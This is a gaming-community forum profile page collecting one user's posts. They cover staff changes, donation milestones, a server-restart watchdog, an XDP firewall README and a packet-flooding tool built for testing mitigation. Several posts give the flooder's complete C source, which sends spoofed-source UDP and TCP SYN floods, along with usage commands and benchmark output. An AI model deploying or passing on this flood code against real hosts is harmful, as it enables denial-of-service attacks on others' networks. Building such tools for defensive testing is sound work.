Roy
Content Type
Profiles
Articles
Updates
Projects
Twitch
Website Bugs/Suggestions
Guides
Newsletters
About GFL
Knowledge Base
Expenses/Hardware
Server Comparisons
Routing
Form Bugs
Community Representative Applications
Development Request
Forums
Events
Posts posted by Roy
-
-
- Popular Post
- Popular Post
Hey everyone,
I just wanted to announce some changes to our CS:S Division. This is part one and part two will be released in the near future.
Unfortunately, I won't have time to manage the 24/7 Dust2 server because I'm busy with many other things within GFL at the moment and the server definitely deserves better than an inactive manager such as myself. Therefore, the following changes will be implemented:
- @Runda will be moving to primarily manage our 24/7 Dust2 server.
- @Dreae will be primarily managing our Surf RPG DM server.
- Dreae will be doing technical work within the CS:S division as a whole. He plans to make some pretty awesome plugins such as Discord Integration along with fixing any technical issues existing on the servers at the moment. These are things that if work well with the CS:S division, they could spread to other divisions as well!
- Runda will still have access to Surf RPG DM and implement some changes from time to time when need to be (this is okay with Dreae). However, Runda will primarily focus on 24/7 Dust2.
Thanks!
-
-
I'd like to mention this can be used for GFL's servers as well. I am going to ask one of our SMs if they would like it setup as a test. Once it's proven stable, etc. we can start adding it to more servers. I've noticed sometimes our servers get hung and aren't restarted in hours. Thankfully this should resolve that
We'd set the IPs to our server's internal IPs and have the program running on our machines hosting the game servers themselves. Although the server's IPIP tunnels are inside a Docker container, you can send A2S_INFO requests to them from the host still. Since we cache the A2S_INFO response on our POP servers, an attack targeting the A2S_INFO query specifically won't be able to make this program have false-positives.
Thanks!
-
Hey everyone,
I just wanted to share my newest project! I decided to switch up for one day and instead of programming in C, program in Go/GoLang. This Go tool sends A2S_INFO requests to specified servers inside of a config file. If the server fails to respond to x amount of A2S_INFO requests, it will attempt to kill the server and start it again via the Pterodactyl API.
This is helpful for servers that are hung meaning they technically didn't crash, but something is taking up so many resources that the server is unplayable or offline (most likely a poorly coded addon with an infinite loop).
I'd like to mention I'm still fairly new to Golang. There are probably improvements I can make but the program ultimately works and I've tested it!
Here's the information!
Description
A tool programmed in Go to automatically restart 'hung' game servers/containers via a Pterodactyl API (version 0.7). This only supports game servers that respond to the A2S_INFO query (a Valve Master Server query).Config File
The config file's default path is /etc/pterowatch/pterowatch.conf. This should be a JSON array including the API URL, token, and an array of servers to check against. The main options are the following:- apiURL => The Pterodactyl API URL.
- token => The bearer token to use when sending HTTP POST requests to the Pterodactyl API.
- servers => An array of servers to check against (read below).
The servers array should contain the following members:
- enable => If true, this server will be scanned.
- ip => The IP to send A2S_INFO requests to.
- port => The port to send A2S_INFO requests to.
- uid => The server's Pterodactyl UID.
- scantime => How often to scan a game server/container in seconds.
- maxfails => The maximum amount of A2S_INFO response failures before attempting to restart the game server/container.
- maxrestarts => The maximum amount of times we attempt to restart the server until A2S_INFO responses start coming back successfully.
- restartint => When a game server/container is restarted, the program won't start scanning the server until x seconds later.
Configuration Example
Here's an configuration example in JSON:{ "apiURL": "https://panel.mydomain.com", "token": "12345", "servers": [ { "enable": true, "ip": "172.20.0.10", "port": 27015, "uid": "testingUID", "scantime": 5, "maxfails": 5, "maxrestarts": 1, "restartint": 120 }, { "enable": true, "ip": "172.20.0.11", "port": 27015, "uid": "testingUID2", "scantime": 5, "maxfails": 10, "maxrestarts": 2, "restartint": 120 } ] }
Building
You may use git and go build to build this project and produce a binary. Example:git clone https://github.com/gamemann/Pterodactyl-Game-Server-Watch.git cd Pterodactyl-Game-Server-Watch/src go build
Credits- @Roy - Creator.
Thanks!
-
- Popular Post
- Popular Post
Hey everyone,
I just wanted to say we've made another achievement! We've hit over 1000 active users on all GFL's game servers at the same time!

This hasn't happened since 2015. Our all-time record is 1300 players on at the same time and keep in mind we had a TS3 server at 100+ users at the time being tracked. Therefore, the actual record for players on at the same time for game servers is probably around 1200.
I just wanted to say thank you to everybody who has contributed to the community
Our next record to beat is getting above 10,000 users on our official Discord server which I hope to achieve soon-ish once we fix the GMod Discord Integration addon!
I think it's amazing we continue to make these achievements many years later as well!
Thank you.
-
I was a dumb kid in 2011 messing around with Steam groups and made GFL as a joke. Went the opposite direction of how I expected it to go after creating the group though LOL. And I do not regret it!
-
Just an update on this, I've implemented rate-limiting filter options (packets per second/PPS and bytes per second/BPS) along with a blocktime filter option. The blocktime filter option blocks the source IP for x amount of seconds if the packet matches that specific filter. This is useful if you have PPS and BPS filter options set very high, you'd want to set the blocktime value high as well since this is obviously an attack from that source IP. It also technically blocks matched packets faster since it doesn't have to check each packet against the filters after the first match and instead, checks if the source IP is a part of the blacklist BPF map and if it is and the block time hasn't exceeded, it drops the packet immediately.
If you set the blocktime low on these specific filtering rules, packets will come through every x seconds depending on the blocktime value. You may also set blocktime to 0 if you want to block specific packet types, but not the source IP itself.
I'm still working to implement payload matching. However, BPF hasn't liked any of the methods I've used to do this. I'm going to post a thread on the XDP mailing list requesting for assistance regarding this. If I'm able to implement this feature, I believe the software is golden at that point.
Thanks!
-
-
Hey everyone,
I just wanted to share another side, but big project I've been working hard on recently. I decided to make an XDP firewall that reads filtering rules based off of a config file. For those that do not know, XDP is a hook in the NIC's driver. If the host's NIC driver supports XDP-native (support list), you can attach XDP programs to the hook directly inside the NIC driver. When blocking packets on this hook, XDP can drop packets over 10 times faster than IPTables! If your NIC doesn't support XDP-native, it will still attempt to use XDP Generic which isn't as fast, but should be the same speed as IPTables assuming your NIC's driver has enough headroom so it doesn't need to do double copies. XDP is pretty good to use when blocking (D)DoS attacks
Anyways, I will now copy the contents of the GitHub README to this thread.
XDP Firewall
Description
An XDP firewall designed to read filtering rules based off of a config file. This software only supports IPv4 and protocols TCP, UDP, and ICMP at the moment. With that said, the program comes with accepted and blocked packet statistics which can be disabled if need to be.Additionally, if the host's NIC doesn't support XDP-native, the program will attempt to attach via XDP generic. The program firstly tries XDP-native, though.
Command Line Usage
The following command line arguments are supported:- --config -c => Location to config file. Default => /etc/xdpfw/xdpfw.conf.
- --list -l => List all filtering rules scanned from config file.
- --help -h => Print help menu for command line options.
Configuration File Options
Main- interface => The interface for the XDP program to attach to.
- updatetime => How often to update the config and filtering rules. Leaving this at 0 disables auto-updating.
- nostats => If true, no accepted/blocked packet statistics will be displayed in stdout.
Filters
Config option filters is an array. Each filter includes the following options:- enabled => If true, this rule is enabled.
- action => What action to perform against the packet if matched. 0 = Block. 1 = Allow.
- srcip => The source IP to match (e.g. 10.50.0.3).
- dstip => The destination IP to match (e.g. 10.50.0.4).
- min_ttl => The minimum TTL (time to live) the packet has to match.
- max_ttl => The maximum TTL (time to live) the packet has to match.
- max_len => The maximum packet length the packet has to match. This includes the entire frame (ethernet header, IP header, L4 header, and data).
- min_len => The minimum packet length the packet has to match. This includes the entire frame (ethernet header, IP header, L4 header, and data).
- tos => The TOS (type of service) the packet has to match.
- payloadmatch => The payload (L4 data) the packet has to match. The format is in hexadecimal and each byte is separated by a space. An example includes: FF FF FF FF 59.
TCP Options
The config option tcpopts within a filter is an array including TCP options. This should only be one array per filter. Options include:- enabled => If true, check for TCP-specific matches.
- sport => The source port the packet must match.
- dport => The destination port the packet must match.
- urg => If true, the packet must have the URG flag set to match.
- ack => If true, the packet must have the ACK flag set to match.
- rst => If true, the packet must have the RST flag set to match.
- psh => If true, the packet must have the PSH flag set to match.
- syn => If true, the packet must have the SYN flag set to match.
- fin => If true, the packet must have the FIN flag set to match.
UDP Options
The config option udpopts within a filter is an array including UDP options. This should only be one array per filter. Options include:- enabled => If true, check for UDP-specific matches.
- sport => The source port the packet must match.
- dport => The destination port the packet must match.
ICMP Options
The config option icmpopts within a filter is an array including ICMP options. This should only be one array per filter. Options include:- enabled => If true, check for ICMP-specific matches.
- code => The ICMP code the packet must match.
- type => The ICMP type the packet must match.
Note - Everything besides the main enabled and action options within a filter are not required. This means you do not have to define them within your config.
Note - As of right now, the payloadmatch option does not work. I am planning to implement functionality for this soon. Unfortunately, BPF hasn't liked the matching methods I've used so far.
Configuration Example
Here's an example of a config:interface = "ens18"; updatetime = 15; filters = ( { enabled = true, action = 0, udpopts = ( { enabled = true, dport = 27015 } ) }, { enabled = true, action = 1, tcpopts = ( { enabled = true, syn = true, dport = 27015 } ) }, { enabled = true, action = 0, icmpopts = ( { enabled = true, code = 0 } ) }, { enabled = true, action = 0, srcip = "10.50.0.4" } );
Credits
@Roy - Creator.Thanks!
-
I just wanted to provide an update. I made A LOT of changes to this project. You can check the commits here.
I added many new flags/command line options including --internal (when set, the program spoofs the source address from the 10.0.0.0/8 private IPv4 range). I also added a --src argument that allows you to specify a single source IP. With that said, I've added --smac and --dmac for source and destination MAC addresses (e.g. --dmac 1A:3F:2S:4F:D3:F5).
Finally, I HIGHLY improved performance. Before these changes, single-threaded performance was actually faster than multi-threaded performance. It turns out I had bad practices in the thread handles which includes:
- I used rand() which isn't a thread-safe function. This means all the threads would stop on this function and I was using this when calculating random ports, spoofing IPs, and random payload generation. Obviously, this impacted performance quite a bit. Therefore, I started using rand_r(&seed) instead which is a thread-safe function.
- I was using a lot of shared global variables. Therefore, I cut down on this quite a bit. The only legit shared variables I change and use are the packet count and total data count since I'm not sure how to sync these using local variables. Changing the while loop from while(cont) to while(1) highly increased performance as well since it isn't checking the shared cont variable every loop.
- Additionally, using the --verbose (or -v) flag highly decreases performance. This is because it performs fprintf() each packet which highly decreases performance (it's printing a string to stdout every packet, so of course it'd decrease performance). If you want to push as much data as possible out, do not use this flag.
I also added max packet counts and max time since I kept taking down my local network and had to keep rebooting my home server since I was too lazy to directly connect to it and stop the program while connected to the server directly.
With these changes, I was able to push 4 gbps to my loopback interface. Now obviously, my NIC can't actually handle that much, but this is how much the program is capable of pushing out with my CPU speed. Here are some results (please look at the thread count):
One Thread
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 1 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6 Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 1 and Time => 0 micro seconds. Finished in 10 seconds. Packets Total => 465677. Packets Per Second => 46567. Megabytes Total => 671. Megabytes Per Second => 67. Megabits Total => 5372. Megabits Per Second => 537.
Two Threads
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 2 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6 Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 2 and Time => 0 micro seconds. Finished in 10 seconds. Packets Total => 1034995. Packets Per Second => 103499. Megabytes Total => 1492. Megabytes Per Second => 149. Megabits Total => 11939. Megabits Per Second => 1193.
Six Threads
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 6 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6 Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 6 and Time => 0 micro seconds. Finished in 10 seconds. Packets Total => 3116140. Packets Per Second => 311614. Megabytes Total => 4496. Megabytes Per Second => 449. Megabits Total => 35970. Megabits Per Second => 3597.
Twelve Threads (CPU count on VM)
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 12 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6 Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 12 and Time => 0 micro seconds. Finished in 10 seconds. Packets Total => 3591233. Packets Per Second => 359123. Megabytes Total => 5243. Megabytes Per Second => 524. Megabits Total => 41951. Megabits Per Second => 4195.
Twenty-Four Threads (same performance as twelve threads since that's my CPU count)
root@test02:/home/dev/pcktflood/src# ./flood --dev ens18 --dst 127.0.0.1 -p 33 --internal -t 24 --interval 0 --min 1400 --max 1400 --time 10 --dmac 1A:C4:DF:70:D8:A6 Launching against 127.0.0.1:33 (0 = random) from interface ens18. Thread count => 24 and Time => 0 micro seconds. Finished in 10 seconds. Packets Total => 3584189. Packets Per Second => 358418. Megabytes Total => 5239. Megabytes Per Second => 523. Megabits Total => 41918. Megabits Per Second => 4191.
As I said before, this was against the loopback interface. I didn't want to perform this against another home VM I have because it'd take down my network and I've done that too many times already, haha.
Thanks!
-
Hey everyone,
If you noticed our servers being password-protected randomly recently or just had invalid information on HLSW or in the in-game server browser, this was due to a bug that should be resolved now. I applied a patch I implemented on Compressor V1 to our NYC POP a couple weeks ago. It was supposed to spread traffic to the AF_XDP socket to all RX queues. This worked for our old Hivelocity POP because we had a dedicated NIC/machine with the same amount as actual RX queues as CPUs. However, since our POP servers are virtualized, we didn't actually have the same RX queue count as CPU count and I think this was the issue.
I told @Dreae to revert this pull request to Compressor V1 and I'm going to work to find a way to get the actual RX queue count of a server instead of just the CPU count (you can have less RX queues than CPUs).
Thank you for understanding.
-
5 minutes ago, .tr0ns said:
it was just a vb.net virus that tricked wanna be xbox kids into downloading it to ddos their opponents! It was a big meme amungst the IT/infosec community.
https://knowyourmeme.com/photos/286458-9gagThat's great haha! Love seeing script-kiddies tricked in that case.
-
3 hours ago, .tr0ns said:
you should contribute to the LOIC project!!!

I'd assume this is some sort of open-source (D)DoS tool? To be honest, my intentions aren't to attack others haha. Instead, I'm trying to do a lot of pen-testing against my local network to learn how to block these type of attacks on our Anycast network. With Compressor V2 that @Dreae and I are working on, we'll be implementing our own (D)DoS filtering. Therefore, I'm trying to understand how attacks work and what I can do to mitigate them, etc.
In the TCP SYN flood case, I was messing with TCP SYN cookies, the TCP connection backlog queue, TCP timeouts, and more!
Thanks.
-
Latest source code of src/flood.c can be found here:
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/sysinfo.h> #include <netinet/in.h> #include <net/if.h> #include <linux/if.h> #include <linux/if_ether.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/udp.h> #include <linux/if_packet.h> #include <arpa/inet.h> #include <signal.h> #include <sys/ioctl.h> #include <inttypes.h> #include <getopt.h> #include <pthread.h> #include <string.h> #include "include/csum.h" #define MAX_PCKT_LENGTH 0xFFFF // Command line structure. struct pcktinfo { char *dIP; char *interface; uint16_t port; uint64_t time; uint16_t threads; uint16_t min; uint16_t max; } pckt; // Global variables. uint8_t cont = 1; int help = 0; int tcp = 0; int verbose = 0; uint8_t dMAC[ETH_ALEN]; uint8_t sMAC[ETH_ALEN]; void signalHndl(int tmp) { cont = 0; } void GetGatewayMAC() { char cmd[] = "ip neigh | grep \"$(ip -4 route list 0/0|cut -d' ' -f3) \"|cut -d' ' -f5|tr '[a-f]' '[A-F]'"; FILE *fp = popen(cmd, "r"); if (fp != NULL) { char line[18]; if (fgets(line, sizeof(line), fp) != NULL) { sscanf(line, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", &dMAC[0], &dMAC[1], &dMAC[2], &dMAC[3], &dMAC[4], &dMAC[5]); } pclose(fp); } } uint16_t randNum(uint16_t min, uint16_t max) { return (rand() % (max - min + 1)) + min; } void *threadHndl(void *data) { // Create sockaddr_ll struct. struct sockaddr_ll sin; // Fill out sockaddr_ll struct. sin.sll_family = PF_PACKET; sin.sll_ifindex = if_nametoindex(pckt.interface); sin.sll_protocol = htons(ETH_P_IP); sin.sll_halen = ETH_ALEN; // Initialize socket FD. int sockfd; // Attempt to create socket. if ((sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); pthread_exit(NULL); } // Receive the interface's MAC address (the source MAC). struct ifreq ifr; strcpy(ifr.ifr_name, pckt.interface); // Attempt to get MAC address. if (ioctl(sockfd, SIOCGIFHWADDR, &ifr) != 0) { perror("ioctl"); pthread_exit(NULL); } // Copy source MAC to necessary variables. memcpy(sMAC, ifr.ifr_addr.sa_data, ETH_ALEN); memcpy(sin.sll_addr, sMAC, ETH_ALEN); // Attempt to bind socket. if (bind(sockfd, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("bind"); pthread_exit(NULL); } // Loop. while (cont) { // Get source port (random). uint16_t srcPort; srcPort = randNum(1024, 65535); // Get destination port. uint16_t dstPort; // Check if port is 0 (random). if (pckt.port == 0) { dstPort = randNum(10, 65535); } else { dstPort = pckt.port; } // Spoof source IP as any IP address. uint16_t tmp[4]; char IP[32]; tmp[0] = randNum(1, 254); tmp[1] = randNum(1, 254); tmp[2] = randNum(1, 254); tmp[3] = randNum(1, 254); sprintf(IP, "%d.%d.%d.%d", tmp[0], tmp[1], tmp[2], tmp[3]); // Initialize packet buffer. char buffer[MAX_PCKT_LENGTH]; // Create ethernet header. struct ethhdr *eth = (struct ethhdr *)(buffer); // Fill out ethernet header. eth->h_proto = htons(ETH_P_IP); memcpy(eth->h_source, sMAC, ETH_ALEN); memcpy(eth->h_dest, dMAC, ETH_ALEN); // Create IP header. struct iphdr *iph = (struct iphdr *)(buffer + sizeof(struct ethhdr)); // Fill out IP header. iph->ihl = 5; iph->version = 4; // Check for TCP. if (tcp) { iph->protocol = IPPROTO_TCP; } else { iph->protocol = IPPROTO_UDP; } iph->id = 0; iph->frag_off = 0; iph->saddr = inet_addr(IP); iph->daddr = inet_addr(pckt.dIP); iph->tos = 0x00; iph->ttl = 64; // Calculate payload length and payload. uint16_t dataLen = randNum(pckt.min, pckt.max); // Initialize payload. uint16_t l4header = (iph->protocol == IPPROTO_TCP) ? sizeof(struct tcphdr) : sizeof(struct udphdr); unsigned char *data = (unsigned char *)(buffer + sizeof(struct ethhdr) + sizeof(struct iphdr) + l4header); // Fill out payload with random characters. for (uint16_t i = 0; i < dataLen; i++) { *data = rand() % 255; *data++; } // Check protocol. if (iph->protocol == IPPROTO_TCP) { // Create TCP header. struct tcphdr *tcph = (struct tcphdr *)(buffer + sizeof(struct ethhdr) + sizeof(struct iphdr)); // Fill out TCP header. tcph->doff = 5; tcph->source = htons(srcPort); tcph->dest = htons(dstPort); tcph->ack_seq = 0; tcph->seq = 0; // Set SYN flag to 1. tcph->syn = 1; // Calculate length and checksum of IP header. iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + dataLen); iph->check = 0; iph->check = ip_fast_csum(iph, iph->ihl); // Calculate TCP header checksum. tcph->check = 0; tcph->check = csum_tcpudp_magic(iph->saddr, iph->daddr, sizeof(struct tcphdr) + dataLen, IPPROTO_TCP, csum_partial(tcph, sizeof(struct tcphdr) + dataLen, 0)); } else { // Create UDP header. struct udphdr *udph = (struct udphdr *)(buffer + sizeof(struct ethhdr) + sizeof(struct iphdr)); // Fill out UDP header. udph->source = htons(srcPort); udph->dest = htons(dstPort); udph->len = htons(sizeof(struct udphdr) + dataLen); // Calculate length and checksum of IP header. iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + dataLen); iph->check = 0; iph->check = ip_fast_csum(iph, iph->ihl); // Calculate UDP header checksum. udph->check = 0; udph->check = csum_tcpudp_magic(iph->saddr, iph->daddr, sizeof(struct udphdr) + dataLen, IPPROTO_UDP, csum_partial(udph, sizeof(struct udphdr) + dataLen, 0)); } // Initialize variable that represents how much data we've sent. uint16_t sent; // Attempt to send data. if ((sent = sendto(sockfd, buffer, ntohs(iph->tot_len) + sizeof(struct ethhdr), 0, (struct sockaddr *)&sin, sizeof(sin))) < 0) { perror("send"); continue; } // Verbose mode. if (verbose) { fprintf(stdout, "Sent %d bytes to destination.\n", sent); } // Check if we should wait between packets. if (pckt.time > 0) { usleep(pckt.time); } } // Close socket. close(sockfd); } // Command line options. static struct option longoptions[] = { {"dev", required_argument, NULL, 'i'}, {"dst", required_argument, NULL, 'd'}, {"port", required_argument, NULL, 'p'}, {"interval", required_argument, NULL, 1}, {"threads", required_argument, NULL, 't'}, {"min", required_argument, NULL, 2}, {"max", required_argument, NULL, 3}, {"verbose", no_argument, &verbose, 'v'}, {"tcp", no_argument, &tcp, 4}, {"help", no_argument, &help, 'h'}, {NULL, 0, NULL, 0} }; void parse_command_line(int argc, char *argv[]) { int c; // Parse command line. while ((c = getopt_long(argc, argv, "i:d:t:vh", longoptions, NULL)) != -1) { switch(c) { case 'i': pckt.interface = optarg; break; case 'd': pckt.dIP = optarg; break; case 'p': pckt.port = atoi(optarg); break; case 1: pckt.time = strtoll(optarg, NULL, 10); break; case 't': pckt.threads = atoi(optarg); break; case 2: pckt.min = atoi(optarg); break; case 3: pckt.max = atoi(optarg); break; case 'v': verbose = 1; break; case 'h': help = 1; break; case '?': fprintf(stderr, "Missing argument.\n"); break; } } } int main(int argc, char *argv[]) { // Set optional defaults. pckt.threads = get_nprocs(); pckt.time = 1000000; pckt.port = 0; pckt.min = 0; pckt.max = 1200; // Parse the command line. parse_command_line(argc, argv); // Check if help flag is set. If so, print help information. if (help) { fprintf(stdout, "Usage for: %s:\n" \ "--dev -i => Interface name to bind to.\n" \ "--dst -d => Destination IP to send TCP packets to.\n" \ "--port -p => Destination port (0 = random port).\n" \ "--interval => Interval between sending packets in micro seconds.\n" \ "--threads -t => Amount of threads to spawn (default is host's CPU count).\n" \ "--verbose -v => Print how much data we sent each time.\n" \ "--min => Minimum payload length.\n" \ "--max => Maximum payload length.\n" \ "--tcp => Send TCP packet with SYN flag set instead of UDP packet.\n" \ "--help -h => Show help menu information.\n", argv[0]); exit(0); } // Check if interface argument was set. if (pckt.interface == NULL) { fprintf(stderr, "Missing --dev option.\n"); exit(1); } // Check if destination IP argument was set. if (pckt.dIP == NULL) { fprintf(stderr, "Missing --dst option\n"); exit(1); } // Get destination MAC address (gateway MAC). GetGatewayMAC(); // Print information. fprintf(stdout, "Launching against %s:%d (0 = random) from interface %s. Thread count => %d and Time => %" PRIu64 " micro seconds.\n", pckt.dIP, pckt.port, pckt.interface, pckt.threads, pckt.time); // Loop thread each thread. for (uint16_t i = 0; i < pckt.threads; i++) { // Create pthread. pthread_t pid; if ((pid = pthread_create(&pid, NULL, threadHndl, NULL) != 0)) { fprintf(stderr, "Error spawning thread %" PRIu16 "...\n", i); } } // Signal. signal(SIGINT, signalHndl); // Loop! while (cont) { sleep(1); } // Debug. fprintf(stdout, "Cleaning up...\n"); // Wait a second for cleanup. sleep(1); // Exit program successfully. exit(0); }
Thanks!
-
Hey everyone,
I just wanted to release my newest C project here. I've rewritten my UDP Sender program and added support for TCP SYN flooding. This also randomizes/spoofs the source IP and port each time a packet is sent. Therefore, it will come from a new IP each time. I made this program to test mitigating TCP-related attacks (such as the common SYN flood attack). I've been messing with TCP SYN cookies, the TCP backlog queue, TCP timeouts, and more to see how a flood affects the victim. I've been doing all of this testing on my local network.
Description
This is an improved version of my UDP Sender program. However, this program also supports TCP SYN floods. The source IP is completely randomized/spoofed each time a packet is sent.
Why Did I make This?
I've been learning how to mitigate TCP-related attacks recently and decided to make a TCP SYN flood tool. Since I was planning to rewrite my UDP Sender program anyways, I decided to create a program that does both UDP and TCP (SYN) floods.
Compiling
I used GCC to compile this program. You must add -lpthread at the end of the command when compiling via GCC.
Here's an example:
gcc -g src/flood.c -o src/flood -lpthread
Usage
Here's output from the --help flag that goes over the program's command line usage:
./flood --help Usage for: ./flood: --dev -i => Interface name to bind to --dst -d => Destination IP to send TCP packets to --port -p => Destination port (0 = random port) --interval => Interval between sending packets in micro seconds. --threads -t => Amount of threads to spawn (default is host's CPU count) --verbose -v => Print how much data we sent each time. --min => Minimum payload length. --max => Maximum payload length. --tcp => Send TCP packet with SYN flag set instead of UDP packet. --help -h => Show help menu information.
Example:
./flood --dev ens18 --dst 10.50.0.4 --port 80 -t 1 --interval 100000 --tcp --min 1200 --max 1200 -v
Credits
- @Roy - Created the program.
Thanks!
-
2 minutes ago, Leks said:
@Roy was your senior quote seriously that? i cba with u LOL
Best quote of the class. Others in the class agreed!
EDIT
All these other people wrote long thought-out quotes and I'm over here quoting Spongebob rofl.
-
I have four pics to share. Two are from recently and the other two are from my Senior Year of High School (I went through my year book tonight). The pics aren't great, but YOLO.
Recent
This was when I was taking care of my colleague's dog. The dog is ADORABLE and reminds me a lot of the Black Lab I had at my parent's house. Just a lot more energetic!
This pic was a couple weeks ago! @braed thank you and Paul again for everything!
Senior Year
P.S. I have the best Senior Year quote and I think that basically describes me during Senior Year lmao!
Try to find me in the pic above
Hint -> I look dead as FUCK!
-
Updated to March of 2020. Considering we're at $10000 now, I'm going to guess we've made A LOT of money during April! I will look at that report soon.
EDIT
We've received $3000+ so far in April and sent ~$700 (we've saved a lot of money since we aren't paying as many overage fees).
Thanks!
-
- Popular Post
- Popular Post
Hey everyone,
I made a status update for this, but I figured it's worth a thread since it's a pretty big accomplishment for GFL!

We have hit over $10000 as our balance for the first time ever. This counter indicates how much money we have in our PayPal balance for those that do not know.
For those that don't know, at some point in 2016 (four years ago), we only had a balance of $200 - $500 and owed $1000+ at one point. We nearly died at this time and the fact that we're now at $10000+ shows how far the community has come
I also want to mention that all money donated to GFL goes into GFL only. Therefore, we're going to be spending quite a bit once @Dreae and I complete Compressor V2 and we start to heavily expand our Anycast infrastructure.
I just wanted to thank all of our Supporters and VIPs for making this possible!
Thank you.
-
If you ever need help with programming or just want to talk, you know I'm here @JGuary551
-
I just wanted to provide a small update, Compressor V2 planning has started and the planning can be found here for those interested:
https://gitlab.com/srcds-compressor/compressor/-/issues
This is something I'm very excited about! I also wanted to say thank you to @Dreae for all the hard work he is putting into this!
Thanks!
-
For whatever reason, the AFK Manager sets the player's AFK status to true until they are actually AFK and come out of it. This messes up the AFKM_IsClientAFK native for us. Therefore, I had to comment out this part of the code for the CS:S BHop server for now.
I will be modifying the AFK Manager plugin later and rework it so it doesn't set the player's AFK status to true by default.
Thanks!
-
25 minutes ago, koen said:
Sounds technical but interesting (server manager here too XD). Thanks for all the hard work! Hope it all works out!
Thank you
I'm hoping it all works out as well! We should be able to get everything done besides Compressor V2 in the next couple of weeks. I have no ETA on Compressor V2 unfortunately since that's a pretty major project.
Thanks!
-
- Popular Post
- Popular Post
Hey everyone,
I just wanted to provide an update on the technical side of GFL. We've been making a lot of progress recently and have exciting projects coming up! I will be covering these topics today.
ACL Rules Removal From New Hosting Provider
We've recently purchased a dedicated server from a new hosting provider. I've been wanting to go with this hosting provider for quite some time and finally decided to do so when our GS2990wx machine's hard drive got corrupted last weekend.
The one thing that I've been waiting on is hearing back from the hosting provider's DC on whether they can remove ACL rules that can allow us to spoof traffic out as our Anycast IPv4 range. As of right now, all game server outbound traffic from the machine is flowing through the Chicago POP server. This results in bandwidth overage fees, additional latency, and more. When we get the ACL rules removed, we'd be able to use the TC BPF program I made and send outgoing traffic back to the client directly by spoofing the source IP as the Anycast network (along with removing the outer IP header, etc). For a full list of benefits from this TC BPF program, please read this post here.
A couple days ago I was told this is possible from the DC. However, there is an one-time $35 fee for this and I need to provide the following:
- The IPv4 range (92.119.148.0/24 in this case, obviously).
- An explanation on why I need these ACL rules removed for our IPv4 range.
- A signed authorization letter.
Considering this will be saving us possibly $400+/m of bandwidth overage fees in the future, I feel the $35.00 one-time fee is worth it. I will be compiling all this information once I hear back from the hosting provider regarding the requirements for the signed authorization letter.
Expansion With New Hosting Provider
So far, our new hosting provider has been awesome! I haven't seen any reports of our Rust Modded servers suffering from performance issues since moving to the new hosting provider. The machine has an Intel i9-9900K processor with 64 GBs of RAM and 1 TB NVMe storage and is turbo-boosting to 4.6 - 4.8 GHz (all cores).
One thing that is unfortunate with the new hosting provider is when the processor gets near dangerous CPU temperatures, it will need to down-clock the clock speeds. I haven't seen this become an issue so far and it seems this is something they'll be improving on as well (getting better cooling and so on). The minimum speeds I've seen are 4.6 GHz on all cores under high load which is still pretty decent. It appears to be handling our servers without any issues anyways.
If things continue to go well, I plan to keep expanding with this hosting provider. If we do this, we will be dropping our machines with Nexril. Nexril has been a great hosting provider during our time with them and I've recommended them to many other server owners. The CEO (James) is very cool as well! However, their Intel i9-9900K machines are $249.00/m compared to our new hosting provider at $139.99/m.
I also plan to order the following two additional machines after proven stability and the ACL rules are removed allowing us to spoof out as our Anycast network:
- Intel i9-9900K with 64 GBs of RAM and 1 TB NVMe storage -> This will host the rest of our game servers on Nexril at the moment.
- Intel i7-9700K with 32 GBs of RAM and 500 GBs NVMe storage (custom build) -> This will host our intense game servers such as our high-slot Rust servers. The Intel i7-9700K won't include hyper-threading. Therefore, it will run slightly cooler and may allow higher turbo-boost speeds (i.e. higher single-threaded performance which is important for our intense servers).
Once I have an update on this topic specifically, I will let you know!
GS2990wx And GS3900X Machines
@dagreek ordered a new 1 TB SSD for the GS2990wx machine which recently suffered a hard drive corruption/failure. These machines weren't meeting the performance expectations needed and we had to move our game servers over to our new hosting provider. However, I am not counting these machines out! I still think the machine's hardware (processor, RAM, and storage) are great and if we can find out what was causing the performance issues (more than likely network-related), we can use these machines for some of our game servers still. Any that want to be located in NYC at least. I forgot to mention, we aren't paying for these machines as well!
I will be launching an investigation regarding these performance issues. I will start by creating C software that can pen-test the machine's NIC to see if that is the bottleneck. I will also be doing other testing as well. I want to see if the issue also exists on the GS3900x machine as well since I've only seen reports from servers on the GS2990wx machine (e.g. I wonder if it was the previously corrupted hard drive that may have been causing issues). Now that we don't have any active game servers running, I won't need to worry about debugging that might result in the game servers going down!
Once I have an update on this, I will let everybody know!
Packet Loss On Machine With New Hosting Provider
